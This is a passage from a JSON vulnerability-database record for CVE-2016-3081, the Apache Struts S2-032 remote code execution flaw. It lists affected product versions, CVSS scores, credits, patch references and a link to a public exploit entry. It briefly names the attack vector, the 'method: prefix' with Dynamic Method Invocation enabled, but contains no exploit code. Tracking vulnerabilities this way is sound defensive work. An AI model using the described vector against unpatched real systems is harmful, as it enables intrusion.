0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:struts", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:micros_retail_xbri_loss_prevention", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:flexcube_private_banking", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:siebel_crm", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-002326", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Nike Zheng nike.zheng@dbappsecurity.com.cn", sources: [ { db: "CNNVD", id: "CNNVD-201604-585", }, ], trust: 0.6, }, cve: "CVE-2016-3081", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "COMPLETE", baseScore: 9.3, confidentialityImpact: "COMPLETE", exploitabilityScore: 8.6, id: "CVE-2016-3081", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:C/I:C/A:C", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 8.1, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.2, id: "CVE-2016-3081", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3081", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3081", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201604-585", trust: 0.6, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-3081", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. Apache Struts2 Contains a vulnerability that allows execution of arbitrary code. Note that this vulnerability was used proof-of-concept The code has been released. National Vulnerability Database (NVD) Then CWE-77 It is published as CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) http://cwe.mitre.org/data/definitions/77.htmlA remote attacker could execute arbitrary code on the server where the product is running. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system", sources: [ { db: "NVD", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "VULMON", id: "CVE-2016-3081", }, ], trust: 2.25, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=39756", trust: 0.1, type: "exploit", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3081", trust: 2.8, }, { db: "BID", id: "87327", trust: 1.9, }, { db: "BID", id: "91787", trust: 1.9, }, { db: "PACKETSTORM", id: "136856", trust: 1.6, }, { db: "SECTRACK", id: "1035665", trust: 1.6, }, { db: "EXPLOIT-DB", id: "39756", trust: 1.6, }, { db: "JVN", id: "JVNVU91375252", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2016-002326", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201604-585", trust: 0.6, }, { db: "VULMON", id: "CVE-2016-3081", trust: 0.1, }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, id: "VAR-201604-0434", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VARIoT devices database", id: null, }, ], trust: 0.592803025, }, last_update_date: "2024-11-23T20:43:13.540000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "S2-032: Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.", trust: 0.8, url: "http://struts.apache.org/docs/s2-032.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: 